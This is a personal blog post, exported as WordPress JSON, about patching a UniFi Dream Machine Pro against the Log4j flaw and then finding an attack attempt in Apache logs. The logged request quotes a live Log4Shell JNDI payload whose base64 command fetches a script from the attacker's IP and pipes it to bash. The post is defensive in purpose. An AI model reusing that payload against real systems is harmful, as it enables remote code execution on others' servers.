{"id":1535,"date":"2021-12-10T19:03:58","date_gmt":"2021-12-11T00:03:58","guid":{"rendered":"https:\/\/blog.lufamily.ca\/kang\/?p=1535"},"modified":"2022-05-04T19:22:21","modified_gmt":"2022-05-04T23:22:21","slug":"log4j-zero-day","status":"publish","type":"post","link":"https:\/\/blog.lufamily.ca\/kang\/2021\/12\/10\/log4j-zero-day\/","title":{"rendered":"Log4J Zero Day"},"content":{"rendered":"\n<p>I was couch surfing YouTube and came across this video:<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<span class=\"embed-youtube\" style=\"text-align:center; display: block;\"><iframe loading=\"lazy\" class=\"youtube-player\" width=\"840\" height=\"473\" src=\"https:\/\/www.youtube.com\/embed\/CvkUPvIMM7o?version=3&#038;rel=1&#038;showsearch=0&#038;showinfo=1&#038;iv_load_policy=1&#038;fs=1&#038;hl=en-CA&#038;autohide=2&#038;wmode=transparent\" allowfullscreen=\"true\" style=\"border:0;\" sandbox=\"allow-scripts allow-same-origin allow-popups allow-presentation allow-popups-to-escape-sandbox\"><\/iframe><\/span>\n<\/div><figcaption>Lawrence Technology Services detailing the impact of Java Log4j<\/figcaption><\/figure>\n\n\n\n<p>Since Unifi is my front line defence, I learned from the video that a patch from Unifi is already available for my Unifi Dream Machine (UDM) Pro. Of course, this prompted me to jump from my couch to my computer and immediately proceed to upgrade my Network application.<\/p>\n\n\n\n<p>Thanks to Unifi for addressing this so quickly. However, it was a release candidate, so I could not upgrade it via the user interface. 
Instead, I followed Unifi&#8217;s <a rel=\"noreferrer noopener\" href=\"https:\/\/help.ui.com\/hc\/en-us\/articles\/204910064-UniFi-Network-Advanced-Device-and-Application-Update\" target=\"_blank\">recommendation<\/a> and did the following.<\/p>\n\n\n\n<p>First, open a remote shell via <code>ssh<\/code> into the UDM Pro.<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code>% <strong>ssh udmpro<\/strong> \nWelcome to UbiOS\n\nBy logging in, accessing, or using the Ubiquiti product, you\nacknowledge that you have read and understood the Ubiquiti\nLicense Agreement and agree to be bound by its terms.\n\n  ___ ___      .__________.__\n |   |   |____ |__\\_  ____\/__|\n |   |   \/    \\|  ||  __) |  |   (c) 2010-2021\n |   |  |   |  \\  ||  \\   |  |   Ubiquiti Inc.\n |______|___|  \/__||__\/   |__|\n            |_\/                  http:\/\/www.ui.com\n\n      Welcome to UniFi Dream Machine!\n\n# <strong>unifi-os shell<\/strong>\nroot@ubnt:\/# cd \/tmp\nroot@ubnt:\/tmp# ls\nhsperfdata_unifi  local.list  unifi-network-status-response  uploads<\/code><\/pre>\n\n\n\n<p>Ensure there is no previous version of <code>unifi_sysvinit_all.deb<\/code> in the <code>\/tmp<\/code> directory. If there is one, remove it.<\/p>\n\n\n\n<p>The next step is to download the release candidate version via <code>curl<\/code>, and then install it using <code>dpkg<\/code>.<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code>root@ubnt:\/tmp# <strong>curl -o \"unifi_sysvinit_all.deb\" https:\/\/dl.ui.com\/unifi\/6.5.54-3b5d40203c\/unifi_sysvinit_all.deb<\/strong>\n  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current\n                                 Dload  Upload   Total   Spent    Left  Speed\n100  126M  100  126M    0     0  27.1M      0  0:00:04  0:00:04 --:--:-- 28.7M\n\nroot@ubnt:\/tmp# <strong>dpkg -i unifi_sysvinit_all.deb<\/strong>\n\n(Reading database ... 
65989 files and directories currently installed.)\nPreparing to unpack unifi_sysvinit_all.deb ...\ndebconf: unable to initialize frontend: Dialog\ndebconf: (No usable dialog-like program is installed, so the dialog based frontend cannot be used. at \/usr\/share\/perl5\/Debconf\/FrontEnd\/Dialog.pm line 76.)\ndebconf: falling back to frontend: Readline\nUnpacking unifi (6.5.54-16676-1) over (6.5.53-16673-1) ...\nSetting up unifi (6.5.54-16676-1) ...\nProcessing triggers for systemd (241-5~bpo9+1) ...\n#-> ubnt-dpkg-cache install\nremoving \/data\/dpkg-cache\/stretch\/packages\/unifi_6.5.53-16673-1_all.deb ... done\nunifi: action=install, package=\/data\/dpkg-cache\/stretch\/packages\/unifi_6.5.54-16676-1_all.deb mark=manual\n&lt;-# ubnt-dpkg-cache install\n\nroot@ubnt:\/tmp# <strong>rm unifi_sysvinit_all.deb<\/strong><\/code><\/pre>\n\n\n\n<p>Once the installation is completed, we remove the Debian package.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large border-image\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"735\" src=\"https:\/\/blog.lufamily.ca\/kang\/wp-content\/uploads\/sites\/3\/2021\/12\/Screen-Shot-2021-12-10-at-6.59.05-PM-1024x735.png\" alt=\"\" class=\"wp-image-1537\" srcset=\"https:\/\/blog.lufamily.ca\/kang\/wp-content\/uploads\/sites\/3\/2021\/12\/Screen-Shot-2021-12-10-at-6.59.05-PM-1024x735.png 1024w, https:\/\/blog.lufamily.ca\/kang\/wp-content\/uploads\/sites\/3\/2021\/12\/Screen-Shot-2021-12-10-at-6.59.05-PM-300x215.png 300w, https:\/\/blog.lufamily.ca\/kang\/wp-content\/uploads\/sites\/3\/2021\/12\/Screen-Shot-2021-12-10-at-6.59.05-PM-768x551.png 768w, https:\/\/blog.lufamily.ca\/kang\/wp-content\/uploads\/sites\/3\/2021\/12\/Screen-Shot-2021-12-10-at-6.59.05-PM.png 1134w\" sizes=\"auto, (max-width: 709px) 85vw, (max-width: 909px) 67vw, (max-width: 1362px) 62vw, 840px\" \/><\/figure>\n\n\n\n<p>As you can see above, the Network application is now updated to 6.5.54.<\/p>\n\n\n\n<p>Once again, thanks to the folks at Unifi 
for coming out with such a rapid fix.<\/p>\n\n\n\n<p><strong>Update:<\/strong><\/p>\n\n\n\n<p>I was curious whether my server was being attacked with this vector and, sure enough, there was an attempt logged at around 1pm today.<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code>kang@avs \u279c\/var\/log\/apache2 \n% grep jndi *.log\naccess.log:45.155.205.233 - - &#91;10\/Dec\/2021:13:01:48 -0500] \"GET \/ HTTP\/1.1\" 403 489 \"-\" \"<strong>${jndi:ldap:\/\/45.155.205.233:12344\/Basic\/Command\/Base64\/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xNzQuMTE5LjE5OS4xNzE6ODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvMTc0LjExOS4xOTkuMTcxOjgwKXxiYXNo}<\/strong>\"<\/code><\/pre>\n\n\n\n<p>The request was made from Russia, and it was blocked, so it is probably a good idea to close any holes left open by Log4J. Here is their official <a href=\"https:\/\/logging.apache.org\/log4j\/2.x\/security.html\" target=\"_blank\" rel=\"noreferrer noopener\">page<\/a>.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>I was couch surfing YouTube and came across this video: Since Unifi is my front line defence, I learned from the video that a patch from Unifi is already available for my Unifi Dream Machine (UDM) Pro. 
Of course, this prompted me to jump from my couch to my computer and immediately proceed to upgrade &hellip; <a href=\"https:\/\/blog.lufamily.ca\/kang\/2021\/12\/10\/log4j-zero-day\/\" class=\"more-link\">Continue reading<span class=\"screen-reader-text\"> &#8220;Log4J Zero Day&#8221;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[111],"tags":[],"class_list":["post-1535","post","type-post","status-publish","format-standard","hentry","category-tech"],"jetpack_featured_media_url":"","jetpack_shortlink":"https:\/\/wp.me\/p7V6i8-oL","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/blog.lufamily.ca\/kang\/wp-json\/wp\/v2\/posts\/1535","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.lufamily.ca\/kang\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.lufamily.ca\/kang\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.lufamily.ca\/kang\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.lufamily.ca\/kang\/wp-json\/wp\/v2\/comments?post=1535"}],"version-history":[{"count":8,"href":"https:\/\/blog.lufamily.ca\/kang\/wp-json\/wp\/v2\/posts\/1535\/revisions"}],"predecessor-version":[{"id":1546,"href":"https:\/\/blog.lufamily.ca\/kang\/wp-json\/wp\/v2\/posts\/1535\/revisions\/1546"}],"wp:attachment":[{"href":"https:\/\/blog.lufamily.ca\/kang\/wp-json\/wp\/v2\/media?parent=1535"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.lufamily.ca\/kang\/wp-json\/wp\/v2\/categories?post=1535"},{"taxonomy":"post_tag","embeddable":true,"href":"ht
tps:\/\/blog.lufamily.ca\/kang\/wp-json\/wp\/v2\/tags?post=1535"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}